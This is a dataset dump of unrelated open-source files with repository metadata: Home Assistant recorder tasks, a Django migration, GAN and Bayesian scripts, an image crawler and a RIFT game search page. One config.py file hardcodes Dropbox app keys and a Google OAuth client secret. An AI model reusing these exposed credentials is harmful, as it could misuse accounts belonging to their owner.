render.DEFAULTS['brand'] = "Rackattack"
render.DEFAULTS['mainMenu'] = []
root = rootresource.rootResource()
root.putChild("js", static.File(os.path.join(args.dashboardRoot, "js")))
root.putChild("static", static.File(os.path.join(args.dashboardRoot, "static")))
root.putChild("favicon.ico", static.File(os.path.join(args.dashboardRoot, "static", "favicon.ico")))
server.runUnsecured(root, args.webPort, args.webSocketPort)
|
[
"shlomi@stratoscale.com"
] |
shlomi@stratoscale.com
|
2c99dad24a3c1b9b80a778fbd17b3940b195e505
|
bfda1c08ba7c3df8c34fc6ead8258f8b13d38526
|
/homeassistant/components/recorder/tasks.py
|
e12526b316acabe74496e9da1991cbe04367c4ec
|
[
"Apache-2.0"
] |
permissive
|
cliffordm/home-assistant
|
60353e65505deb1a440986407843d5c98da980a0
|
1c4c0f1eb33302b983cb39f6800cd0fe6943fc4a
|
refs/heads/dev
| 2023-02-22T18:31:50.141720
| 2022-05-19T16:50:54
| 2022-05-19T16:50:54
| 153,680,484
| 0
| 0
|
Apache-2.0
| 2023-02-22T06:19:10
| 2018-10-18T20:01:52
|
Python
|
UTF-8
|
Python
| false
| false
| 7,180
|
py
|
"""Support for recording details."""
from __future__ import annotations
import abc
import asyncio
from collections.abc import Callable, Iterable
from dataclasses import dataclass
from datetime import datetime
import threading
from typing import TYPE_CHECKING, Any
from homeassistant.core import Event
from . import purge, statistics
from .const import DOMAIN, EXCLUDE_ATTRIBUTES
from .models import StatisticData, StatisticMetaData
from .util import periodic_db_cleanups
if TYPE_CHECKING:
from .core import Recorder
class RecorderTask(abc.ABC):
"""ABC for recorder tasks."""
commit_before = True
@abc.abstractmethod
def run(self, instance: Recorder) -> None:
"""Handle the task."""
@dataclass
class ClearStatisticsTask(RecorderTask):
"""Object to store statistics_ids which for which to remove statistics."""
statistic_ids: list[str]
def run(self, instance: Recorder) -> None:
"""Handle the task."""
statistics.clear_statistics(instance, self.statistic_ids)
@dataclass
class UpdateStatisticsMetadataTask(RecorderTask):
"""Object to store statistics_id and unit for update of statistics metadata."""
statistic_id: str
unit_of_measurement: str | None
def run(self, instance: Recorder) -> None:
"""Handle the task."""
statistics.update_statistics_metadata(
instance, self.statistic_id, self.unit_of_measurement
)
@dataclass
class PurgeTask(RecorderTask):
"""Object to store information about purge task."""
purge_before: datetime
repack: bool
apply_filter: bool
def run(self, instance: Recorder) -> None:
"""Purge the database."""
if purge.purge_old_data(
instance, self.purge_before, self.repack, self.apply_filter
):
with instance.get_session() as session:
instance.run_history.load_from_db(session)
# We always need to do the db cleanups after a purge
# is finished to ensure the WAL checkpoint and other
# tasks happen after a vacuum.
periodic_db_cleanups(instance)
return
# Schedule a new purge task if this one didn't finish
instance.queue_task(
PurgeTask(self.purge_before, self.repack, self.apply_filter)
)
@dataclass
class PurgeEntitiesTask(RecorderTask):
"""Object to store entity information about purge task."""
entity_filter: Callable[[str], bool]
def run(self, instance: Recorder) -> None:
"""Purge entities from the database."""
if purge.purge_entity_data(instance, self.entity_filter):
return
# Schedule a new purge task if this one didn't finish
instance.queue_task(PurgeEntitiesTask(self.entity_filter))
@dataclass
class PerodicCleanupTask(RecorderTask):
"""An object to insert into the recorder to trigger cleanup tasks when auto purge is disabled."""
def run(self, instance: Recorder) -> None:
"""Handle the task."""
periodic_db_cleanups(instance)
@dataclass
class StatisticsTask(RecorderTask):
"""An object to insert into the recorder queue to run a statistics task."""
start: datetime
def run(self, instance: Recorder) -> None:
"""Run statistics task."""
if statistics.compile_statistics(instance, self.start):
return
# Schedule a new statistics task if this one didn't finish
instance.queue_task(StatisticsTask(self.start))
@dataclass
class ExternalStatisticsTask(RecorderTask):
"""An object to insert into the recorder queue to run an external statistics task."""
metadata: StatisticMetaData
statistics: Iterable[StatisticData]
def run(self, instance: Recorder) -> None:
"""Run statistics task."""
if statistics.add_external_statistics(instance, self.metadata, self.statistics):
return
# Schedule a new statistics task if this one didn't finish
instance.queue_task(ExternalStatisticsTask(self.metadata, self.statistics))
@dataclass
class AdjustStatisticsTask(RecorderTask):
"""An object to insert into the recorder queue to run an adjust statistics task."""
statistic_id: str
start_time: datetime
sum_adjustment: float
def run(self, instance: Recorder) -> None:
"""Run statistics task."""
if statistics.adjust_statistics(
instance,
self.statistic_id,
self.start_time,
self.sum_adjustment,
):
return
# Schedule a new adjust statistics task if this one didn't finish
instance.queue_task(
AdjustStatisticsTask(
self.statistic_id, self.start_time, self.sum_adjustment
)
)
@dataclass
class WaitTask(RecorderTask):
"""An object to insert into the recorder queue to tell it set the _queue_watch event."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
instance._queue_watch.set() # pylint: disable=[protected-access]
@dataclass
class DatabaseLockTask(RecorderTask):
"""An object to insert into the recorder queue to prevent writes to the database."""
database_locked: asyncio.Event
database_unlock: threading.Event
queue_overflow: bool
def run(self, instance: Recorder) -> None:
"""Handle the task."""
instance._lock_database(self) # pylint: disable=[protected-access]
@dataclass
class StopTask(RecorderTask):
"""An object to insert into the recorder queue to stop the event handler."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
instance.stop_requested = True
@dataclass
class EventTask(RecorderTask):
"""An event to be processed."""
event: Event
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
# pylint: disable-next=[protected-access]
instance._process_one_event(self.event)
@dataclass
class KeepAliveTask(RecorderTask):
"""A keep alive to be sent."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
# pylint: disable-next=[protected-access]
instance._send_keep_alive()
@dataclass
class CommitTask(RecorderTask):
"""Commit the event session."""
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
# pylint: disable-next=[protected-access]
instance._commit_event_session_or_retry()
@dataclass
class AddRecorderPlatformTask(RecorderTask):
"""Add a recorder platform."""
domain: str
platform: Any
commit_before = False
def run(self, instance: Recorder) -> None:
"""Handle the task."""
hass = instance.hass
domain = self.domain
platform = self.platform
platforms: dict[str, Any] = hass.data[DOMAIN]
platforms[domain] = platform
if hasattr(self.platform, "exclude_attributes"):
hass.data[EXCLUDE_ATTRIBUTES][domain] = platform.exclude_attributes(hass)
|
[
"noreply@github.com"
] |
cliffordm.noreply@github.com
|
35745d79bc0f9b883783f984cd1176ae324fce1e
|
edbe27c332625262f11d83d5f4b797402e19a6ea
|
/calculateMpg.py
|
433ab10c39d264e67dac4dcb5224c113119cf925
|
[] |
no_license
|
vithura/Python-Lab4
|
9e505a2c23aaee2582291b08ce07fc739bbc8469
|
cd7aea667f9f7a2a489585221de817b1a05064fe
|
refs/heads/master
| 2020-08-02T02:06:01.056653
| 2019-09-27T00:09:23
| 2019-09-27T00:09:23
| 211,201,708
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 199
|
py
|
import srib0001library
input1 = int(input('How many miles driven'))
input2 = int(input('How much gas you use in gallons'))
print('Your MPG is ' + str(srib0001library.calculateMpg(input1, input2)))
|
[
"srib0001@algonquinlive.com"
] |
srib0001@algonquinlive.com
|
c694dfefddf3e823716546e6067c6c58879bd074
|
387615c1ed7bec3143939dd8647b0642c9f25817
|
/Single Parameter Bayesian Inference/vonMises.py
|
bc7ef2f03ff748a2b32cd9c114ca9618502f9b6b
|
[] |
no_license
|
tsigkas/Bayesian-Methods
|
103cc856eb7b8c8576aacc21e327f8ed81478cab
|
2d3c7b86478fb2dec31ffa26cceeca44dd23fe76
|
refs/heads/main
| 2023-05-14T05:42:58.628944
| 2021-06-09T11:18:49
| 2021-06-09T11:18:49
| 374,657,824
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,168
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.special import iv as bessel
from scipy.integrate import quad
np.random.seed(123) # set seed for reproducibility
# Dataset of wind directions in radians
y = np.array([-2.44, 2.14, 2.54, 1.83, 2.02, 2.33, -2.79, 2.23, 2.07, 2.02])
mu = 2.39
lamda = 1
# Function proportional to the posterior distribution
# Given von-Mises(kappa,mu) likelihood and Exp(lamda) prior
def posterior(kappa, y, lamda, mu):
n = len(y)
return (lamda/bessel(0,kappa))**n*np.exp(kappa*(np.sum(np.cos(y-mu))-lamda))
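# In symbols, the unnormalized posterior evaluated above is
#   p(kappa | y) ∝ [1 / (2*pi*I0(kappa))]^n * exp(kappa * sum_i cos(y_i - mu)) * lamda * exp(-lamda*kappa).
# The code differs from this only by factors that are constant in kappa
# ((2*pi)^n and a power of lamda), which cancel when the density is normalized below.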
# Find posterior for different values of kappa
kappa = np.linspace(0.01,5,10000)
posterior_kappa = np.zeros_like(kappa)
posterior_kappa = posterior(kappa, y, lamda, mu)
# Normalize the posterior so that it integrates to 1
posterior_kappa = posterior_kappa/(quad(posterior, 0.01, 5, args = (y, lamda, mu))[0])
# Find the posterior mode from the density
mode = kappa[np.argmax(posterior_kappa)]
# Plot posterior
plt.plot(kappa, posterior_kappa)
plt.xlabel(r"$\kappa$")
plt.ylabel("posterior density")
plt.vlines(mode,0,np.max(posterior_kappa))
plt.savefig("kappa_posterior_pdf.png", dpi=1500)
plt.show()
|
[
"noreply@github.com"
] |
tsigkas.noreply@github.com
|
415e721fb6d5ea182b0e3b9238b59bba43fd6154
|
f6cb9c53b2f8340b0e2fa18004f79214eb9e27f9
|
/webchat/migrations/0001_initial.py
|
3d028744a7653bd7f198540731ce9817f2edeb84
|
[] |
no_license
|
joey100/simpleBBS
|
3c861a5718c5cfd45d7918aa598b3c4af36a1d8b
|
0697acb1f916ace25d8289e7e9ff54c48d274f48
|
refs/heads/master
| 2021-01-20T20:36:53.052875
| 2016-09-28T02:47:07
| 2016-09-28T02:47:07
| 64,055,300
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,124
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-07-03 09:51
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('bbs', '0002_auto_20160703_1751'),
]
operations = [
migrations.CreateModel(
name='WebGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=64)),
('brief', models.CharField(blank=True, max_length=255, null=True)),
('max_members', models.IntegerField(default=200)),
('admins', models.ManyToManyField(blank=True, related_name='group_admins', to='bbs.UserProfile')),
('members', models.ManyToManyField(blank=True, related_name='group_members', to='bbs.UserProfile')),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bbs.UserProfile')),
],
),
]
|
[
"smartheshuiping@163.com"
] |
smartheshuiping@163.com
|
8dda786957a949c985bd9e218d140b6c11c735e6
|
b6257edc98da9cfffd5666193726c0da48415e29
|
/config.py
|
c0100342c4504364e0d1d32e6c529a5929491572
|
[] |
no_license
|
akhiaji/spear
|
2919af714a274bfee81545bc7f45aa47646d823c
|
2984b7121fdbf3a56fd773473ca5657af09b551a
|
refs/heads/master
| 2020-05-25T11:06:24.669356
| 2015-08-05T10:25:35
| 2015-08-05T10:25:35
| 40,239,613
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 589
|
py
|
DATABASE = '/tmp/spear.db'
DEBUG = True
SECRET_KEY = 'development key'
DROPBOX_APP_KEY = '1szh06pzua9nm1a'
DROPBOX_APP_SECRET = '4pqoe16cl3jtctf'
GDRIVE_CLIENT_ID='384706005510-hbbdfl1tef8g06artuuft5ubc7a9fllp.apps.googleusercontent.com'
GDRIVE_CLIENT_SECRET='RyYaHJkGL_Q9rYeqcjIylbHO'
GDRIVE_REDIRECT_URI = 'http://127.0.0.1:5000/google-auth-finish'
GDRIVE_SCOPE="https://www.googleapis.com/auth/drive"
USER_SCHEMA = ("id", "username", "password", "db_access_token", "gd_access_token")
FILE_SCHEMA = ("id", "owner", "name", "parent", "content_path", "dropbox", "folder", "last_updated")
|
[
"akhiaji@gmail.com"
] |
akhiaji@gmail.com
|
618a19c0b38addb258cf53adb9766c353634ccf0
|
41609905c56ec5c9d00e8d872fb847e5c5be10f4
|
/src/models/image.py
|
7a9d80e2b15b6b8aed44bdf1d31a50565642c093
|
[] |
no_license
|
elmerihyvonen/ImageService
|
6a073cb82ce2995eedad2297d79e776738a2ad80
|
699e7d945e64ea2407c7ea1912ad76b366dc9bb2
|
refs/heads/IS2
| 2023-05-25T13:59:14.272119
| 2023-03-30T16:37:41
| 2023-03-30T16:37:41
| 233,829,284
| 0
| 0
| null | 2023-05-22T22:38:32
| 2020-01-14T11:46:28
|
Python
|
UTF-8
|
Python
| false
| false
| 2,721
|
py
|
import uuid
import datetime
from src.common.database import Database
class Image(object):
def __init__(self, username: str, caption: str, filename: str, author_pic: str,
date=None, _id=None):
self._id = uuid.uuid4().hex if _id is None else _id
self.username = username
self.caption = caption
self.filename = filename
self.author_pic = author_pic
self.date = datetime.datetime.now().strftime("%d/%m/%Y, %H:%M") if date is None else date
    # saving the image into the database
def save_to_mongo(self):
Database.insert(collection="images",
data=self.json())
def json(self):
return {
"_id": self._id,
"username": self.username,
"caption": self.caption,
"filename": self.filename,
"author_pic": self.author_pic,
"date": self.date
}
# saves new image to database
@classmethod
def new_image(cls, username, caption, filename, author_pic):
image = Database.find_one(collection='images', query={'username': username, 'filename': filename})
# checks if this filename already exists for this username
if image is None:
new_image = Image(username, caption, filename, author_pic)
new_image.save_to_mongo()
return True
else:
# return False if the image was already there
return False
# returns a single Image object for given filename
@classmethod
def image_from_mongo(cls, filename):
image_data = Database.find_one(collection='images', query={'filename': filename})
return cls(**image_data)
# returns all images posted by given username
@classmethod
def images_from_mongo(cls, username):
images = Database.find(collection="images",
query={'username': username})
return [cls(**image) for image in images]
# returns all images posted
@classmethod
def all_images(cls):
images = Database.find(collection="images", query={})
return [cls(**image) for image in images]
# returns a single Image object for given _id
@classmethod
def get_by_id(cls, image_id):
image_data = Database.find_one(collection='images', query={'_id': image_id})
return cls(**image_data)
    # removes an image from the database with the given identifier, if one exists
def delete_image(self):
Database.delete(collection='images', query={'_id': self._id})
@classmethod
def delete_images(cls, username):
Database.delete(collection='images', query={'username': username})
|
[
"56589617+elmerihyvonen@users.noreply.github.com"
] |
56589617+elmerihyvonen@users.noreply.github.com
|
cf7e1111fe8cfc94ade35f4ac913406453ead140
|
747de538fb8ffc535a5d107cb5852c885da451b9
|
/experiments/3_graph_classification_half.py
|
d257d878c14b2ad267bf3649e6473754152013eb
|
[] |
no_license
|
NilVidalRafols/iGNNspector
|
0a608ff2aa6a003a6ae22105e286db6023841bcb
|
3d8742e20a5df0606fe201440fe4c382350f68a6
|
refs/heads/main
| 2023-06-05T09:51:00.840402
| 2021-06-30T03:43:57
| 2021-06-30T03:43:57
| 346,396,589
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,575
|
py
|
# -*- coding: utf-8 -*-
"""3. Graph Classification.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1I8a0DfQ3fI7Njc62__mVXUlcAleUclnb
"""
"""# Graph Classification with Graph Neural Networks
[Previous: Node Classification with Graph Neural Networks](https://colab.research.google.com/drive/14OvFnAXggxB8vM4e8vSURUp1TaKnovzX)
In this tutorial session we will have a closer look at how to apply **Graph Neural Networks (GNNs) to the task of graph classification**.
Graph classification refers to the problem of classifying entire graphs (in contrast to nodes), given a **dataset of graphs**, based on some structural graph properties.
Here, we want to embed entire graphs, and we want to embed those graphs in such a way so that they are linearly separable given a task at hand.
The most common task for graph classification is **molecular property prediction**, in which molecules are represented as graphs, and the task may be to infer whether a molecule inhibits HIV virus replication or not.
The TU Dortmund University has collected a wide range of different graph classification datasets, known as the [**TUDatasets**](https://chrsmrrs.github.io/datasets/), which are also accessible via [`torch_geometric.datasets.TUDataset`](https://pytorch-geometric.readthedocs.io/en/latest/modules/datasets.html#torch_geometric.datasets.TUDataset) in PyTorch Geometric.
Let's load and inspect one of the smaller ones, the **MUTAG dataset**:
"""
import torch
from torch_geometric.datasets import TUDataset
|
[
"nil.vidal.rafols@est.fib.upc.edu"
] |
nil.vidal.rafols@est.fib.upc.edu
|
fc448f9c12c61c2fc3ef593aa6433223db03d3fd
|
913d75ae3ff83e6d23cd7043627381c7cc960173
|
/appwechatPO/page/contactdetailbriefInfo.py
|
433201316240c36053d2a1148151eb041eb23d91
|
[] |
no_license
|
CandiceDiao/lagouhomework
|
2655dbb59c891cbff620d4fd655137aa64b8746b
|
59fee20b482657591104cc7b39abd3ea447867d8
|
refs/heads/master
| 2023-01-12T15:18:21.006028
| 2020-11-11T09:07:45
| 2020-11-11T09:07:45
| 273,626,871
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 509
|
py
|
from appium.webdriver.common.mobileby import MobileBy
from appwechatPO.page.basepage import BasePage
# personal information page
from appwechatPO.page.contactdetailsettingpage import ContactDetailSettingPage
class ContactDetailBriefInfo(BasePage):
_member_info='//*[@text="个人信息"]/../../../../../*[@class="android.widget.LinearLayout"][2]'
def click_edit_member_info(self):
self.find(MobileBy.XPATH,self._member_info).click()
return ContactDetailSettingPage(self.driver)
|
[
"diaochen@viewhigh.com"
] |
diaochen@viewhigh.com
|
98134f9a88aa1f45dfb3d8b5fbd0be2bdf81c15a
|
4622f05fa5e686eda93185ceebd9ce631321adea
|
/src/utils.py
|
6346d2c1a90e83ba76cd5f019c63d34a4a18584f
|
[] |
no_license
|
davisliang/generative
|
b4d64654c531abc57573d2364ddab481e75ea3ae
|
8df308e42dc60d559f39e2645a1851f28008a315
|
refs/heads/master
| 2021-06-18T08:47:13.261182
| 2017-06-23T02:20:07
| 2017-06-23T02:20:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,183
|
py
|
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import tensorflow.contrib.slim as slim
import os
import scipy
import input_data
import scipy.misc
# this function performs a leaky ReLU activation, which is needed for the discriminator network.
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
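# Note: f1 * x + f2 * abs(x) evaluates to x for x > 0 and to leak * x for x < 0,
# i.e. a standard leaky ReLU written without a conditional so it stays a single
# TensorFlow graph op.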
#The below functions are taken from carpdem20's implementation https://github.com/carpedm20/DCGAN-tensorflow
#They allow for saving sample images from the generator to follow progress
def save_images(images, size, image_path):
return imsave(inverse_transform(images), size, image_path)
def imsave(images, size, path):
return scipy.misc.imsave(path, merge(images, size))
def inverse_transform(images):
return (images+1.)/2.
def merge(images, size):
h, w = images.shape[1], images.shape[2]
img = np.zeros((h * size[0], w * size[1]))
for idx, image in enumerate(images):
i = idx % size[1]
j = idx // size[1]
img[j*h:j*h+h, i*w:i*w+w] = image
return img
def generator(z, initializer):
zP = slim.fully_connected(z,4*4*256,normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_project',weights_initializer=initializer)
zCon = tf.reshape(zP,[-1,4,4,256])
gen1 = slim.convolution2d_transpose(\
zCon,num_outputs=64,kernel_size=[5,5],stride=[2,2],\
padding="SAME",normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_conv1', weights_initializer=initializer)
gen2 = slim.convolution2d_transpose(\
gen1,num_outputs=32,kernel_size=[5,5],stride=[2,2],\
padding="SAME",normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_conv2', weights_initializer=initializer)
gen3 = slim.convolution2d_transpose(\
gen2,num_outputs=16,kernel_size=[5,5],stride=[2,2],\
padding="SAME",normalizer_fn=slim.batch_norm,\
activation_fn=tf.nn.relu,scope='g_conv3', weights_initializer=initializer)
g_out = slim.convolution2d_transpose(\
gen3,num_outputs=1,kernel_size=[32,32],padding="SAME",\
biases_initializer=None,activation_fn=tf.nn.tanh,\
scope='g_out', weights_initializer=initializer)
return g_out
def discriminator(bottom, initializer, reuse=False):
dis1 = slim.convolution2d(bottom,16,[4,4],stride=[2,2],padding="SAME",\
biases_initializer=None,activation_fn=lrelu,\
reuse=reuse,scope='d_conv1',weights_initializer=initializer)
dis2 = slim.convolution2d(dis1,32,[4,4],stride=[2,2],padding="SAME",\
normalizer_fn=slim.batch_norm,activation_fn=lrelu,\
reuse=reuse,scope='d_conv2', weights_initializer=initializer)
dis3 = slim.convolution2d(dis2,64,[4,4],stride=[2,2],padding="SAME",\
normalizer_fn=slim.batch_norm,activation_fn=lrelu,\
reuse=reuse,scope='d_conv3',weights_initializer=initializer)
d_out = slim.fully_connected(slim.flatten(dis3),1,activation_fn=tf.nn.sigmoid,\
reuse=reuse,scope='d_out', weights_initializer=initializer)
return d_out
|
[
"davisblaine.liang@gmail.com"
] |
davisblaine.liang@gmail.com
|
09f18f3ed911f9d3c785108f4fed976bb636824d
|
926bf2c5275429ffe4a6dcb7989cf9ce84d4234d
|
/14_image_crawling_check_last_modified.py
|
670f791592294b383f362408c0da2c9cb151b84c
|
[] |
no_license
|
Tragicalone/Python
|
4ddc5a1ef9f391b12012dcc37404af7b25022d4c
|
65e2cdf6d6dfbab36f0b2c0164b5ca1b93219dc9
|
refs/heads/master
| 2020-03-26T21:47:33.976719
| 2019-03-04T05:01:41
| 2019-03-04T05:01:41
| 145,408,656
| 0
| 0
| null | 2018-08-20T11:46:33
| 2018-08-20T11:27:31
| null |
UTF-8
|
Python
| false
| false
| 1,130
|
py
|
import os
import requests
from PIL import Image
#from time import ctime
#from pprint import pprint
from bs4 import BeautifulSoup
from datetime import datetime
AssignedLastModifiedTime = datetime(2018, 1, 29, 14, 39, 10)
OutputPath = os.path.abspath('..\PythonResults')
if not os.path.exists(OutputPath):
os.makedirs(OutputPath)
for IMGTag in BeautifulSoup(requests.get("https://afuntw.github.io/Test-Crawling-Website/pages/portfolio/index.html").text, "lxml").find_all('img'):
ImageURL = IMGTag['src']
ImageHeaders = dict(requests.head(ImageURL).headers)
if 'Last-Modified' in ImageHeaders and datetime.strptime(ImageHeaders['Last-Modified'], '%a, %d %b %Y %H:%M:%S GMT') < AssignedLastModifiedTime:
continue
ImageData = Image.open(requests.get(ImageURL, stream=True).raw)
BaseFileName = os.path.basename(ImageURL)
print("catch the filename " + BaseFileName + " and the real format is " + ImageData.format)
SavedFileName = os.path.join(OutputPath, BaseFileName.split('.')[0] + '.' + ImageData.format.lower())
ImageData.save(SavedFileName)
print("save image at " + SavedFileName)
|
[
"tragicalone@yahoo.com.tw"
] |
tragicalone@yahoo.com.tw
|
c536d6ee178ac04d4be8ddd7c1667c5ad1a79b0c
|
10f075f6f875fa185b4da99af468a064c82c91b4
|
/index.py
|
a8ed23e112f7e2b867fce72caa11d42be847d835
|
[
"MIT"
] |
permissive
|
chennin/rift-firsts-webpage
|
c93f3245bf143c48e5c9941bfb018a4c3af0cabe
|
c7442360440004ce689ea4482088d8550bf6678e
|
refs/heads/master
| 2021-01-20T07:02:11.652750
| 2018-08-17T12:05:48
| 2018-08-17T12:05:48
| 89,948,859
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,068
|
py
|
#!/usr/bin/env python3.5
#Copyright (c) 2017 Christopher S Henning
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from six.moves import configparser
from yattag import Doc
import os, glob
import pymysql.cursors
import sys
from datetime import datetime
import re, string
from urllib.parse import parse_qsl
from html import escape
# Read config file in
mydir = os.path.dirname(os.path.realpath(__file__))
configReader = configparser.RawConfigParser()
success = configReader.read(mydir + "/config.txt")
if not success:
sys.exit("Missing configuration file {0}/config.txt".format(mydir))
config = {}
configitems = ["SQLUSER", "SQLDB", "SQLLOC", "SQLPASS", "ZIPDIR"]
for var in configitems:
try:
config[var] = configReader.get("Firsts",var)
except configparser.NoSectionError:
sys.exit("Missing configuration section 'Firsts'")
except (configparser.NoOptionError):
sys.exit("Missing configuration item {0}. {1} are required.".format(var, ", ".join(configitems)))
eushards = ["Bloodiron", "Brisesol", "Brutwacht", "Gelidra", "Typhiria", "Zaviel"]
nashards = ["Deepwood", "Faeblight", "Greybriar", "Hailol", "Laethys", "Seastone", "Wolfsbane"]
kinds = ["All", "Achievement", "ArtifactCollection", "Item", "NPC", "Quest", "Recipe"]
# WSGI function
def application(environ, start_response):
# the environment variable CONTENT_LENGTH may be empty or missing
try:
request_body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
request_body_size = 0
request_body = environ['wsgi.input'].read(request_body_size)
env = dict(parse_qsl(request_body.decode()))
# Initialize search parameters
search = { 'player': "", 'shard': "", 'guild': "", 'kind': "", }
for var in search:
if var in env:
search[var] = env[var]
# Filter invalid input
# An invalid Kind or Shard is reset to All
# Player + Guild names should only contain "letters" (this includes accented letters)
if search['kind'] not in kinds:
search['kind'] = "All"
if search['shard'] not in ["All"] + nashards + eushards:
search['shard'] = "All"
    pattern = re.compile(r'\W+')
    search['player'] = pattern.sub('', search['player'])
    search['player'] = search['player'].capitalize()
    search['guild'] = pattern.sub('', search['guild'])
results = None
# The model is to print verbose errors to console/log, and print a generic error to Web page
# Initialize generic error here
error = None
# If a player name OR guild name is input, search the DB using all parameters
if search['player'] != "" or search['guild'] != "":
query = "SELECT Kind, What, Player, Shard, Guild, Stamp, Id FROM firsts WHERE "
params = []
args = []
for var in search:
# Don't need to search for shard or kind == All
if search[var] != "" and (var not in ["kind", "shard"] or search[var] != "All"):
params.append("{0}=%s ".format(var))
args.append(search[var])
query += "AND ".join(params)
query += " ORDER BY Kind, Stamp"
connection = None
try:
connection = pymysql.connect(host=config["SQLLOC"],
user=config["SQLUSER"],
password=config["SQLPASS"],
db=config["SQLDB"],
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
except Exception as e:
# This just kills one WSGI worker which will be respawned
# Maybe find how to kill the WSGI server if we assume connection problems (eg wrong pass) are fatal
print("Failed to connect to SQL database. {0}".format(e), file=sys.stderr)
error = "Something went wrong with the SQL connection."
if connection:
try:
with connection.cursor() as cursor:
cursor.execute(query, args)
results = cursor.fetchall()
except Exception as e:
print(e, file=sys.stderr)
error = "Something went wrong with the SQL query."
finally:
connection.close()
# OK, now start constructing HTML
# The defaults dict makes the select dropdowns default to the input later
doc, tag, text, line = Doc(defaults = {'shard': search['shard'], 'kind': search['kind']}).ttl()
doc.asis('<!DOCTYPE html>')
with tag('html'):
with tag('head'):
doc.stag('meta', ('http-equiv', "Content-Type"), ('content', "text/html; charset=utf-8"))
doc.stag('link', ('rel', "stylesheet"), ('type', "text/css"), ('href', "style.css"))
doc.stag('link', ('rel', "stylesheet"), ('type', "text/css"), ('href', "https://www.magelocdn.com/pack/magelo-bar-css2.css"))
# <script> is NOT a void tag, so need with/pass
with tag('script', ('src', "./sorttable.js"), ('type', "text/javascript")):
pass
with tag('script', ('src', "https://www.magelocdn.com/pack/rift/en/magelo-bar.js#1"), ('type', "text/javascript")):
pass
with tag('title'):
text("RIFT Shard Firsts Search")
with tag('body'):
# Prevent Cloudflare interpreting Player@Shard as email
doc.asis("<!--email_off-->")
# Intro / search boxes
with tag('h3'):
text("Rift Shard Firsts")
line('p', "This site tells you the shard firsts for your character or guild.")
with tag('p'):
# Find date of latest zip
date = "*unknown*"
for myfile in glob.glob("{0}/Rift_Discoveries*.zip".format(config['ZIPDIR'])):
match = re.search(r'\d{4}-\d{1,2}-\d{1,2}', myfile)
date = datetime.strptime(match.group(), '%Y-%m-%d').date()
text("Data is checked for from Trion daily. The latest is dated ")
line('em', "{0}".format(date))
text(". All information is straight from Trion's ")
line('a', "public assets", href = "http://webcdn.triongames.com/addons/assets/")
text(".")
with tag('form', ('id', "firstfrom")):
line('label', "Character: ", ('for', "player"))
doc.stag('input', ('type', "text"), ('name', "player"), ('id', "player"), ('size', "14"), ('maxlength', "255"), ('value', escape(search['player']) if search['player'] != "" else ""))
line('label', " Shard: ", ('for', "shard"))
with doc.select(('name', "shard"), ('id', "shard")):
line('option', "All")
with tag('optgroup', label = "NA"):
for shard in nashards:
with doc.option(value = shard):
text(shard)
with tag('optgroup', label = "EU"):
for shard in eushards:
with doc.option(value = shard):
text(shard)
line('label', " Guild: ", ('for', "guild"))
doc.stag('input', ('type', "text"), ('name', "guild"), ('id', "guild"), ('size', "14"), ('value', escape(search['guild']) if search['guild'] != "" else ""))
line('label', " Type: ", ('for', "kind"))
with doc.select(('name', "kind"), ('id', "kind")):
for kind in kinds:
with doc.option(value = kind):
text(kind)
doc.stag('input', ('type', "submit"), ('formmethod', "post"))
line('p', "Enter a player name and/or a guild name, then press Submit.")
# If we had an earlier error, print the generic message here
if error:
line('p', error)
# Print search results
# The SQL query above can return firsts of 0-6 Kinds, but was only one query.
# We want to print one table per Kind, and not have empty tables.
# Thus the manual idx incrementing and starting a new table when a new Kind is encountered
if results is not None:
idx = 0
reslen = len(results)
for kind in kinds:
if idx >= reslen: # End of results
break
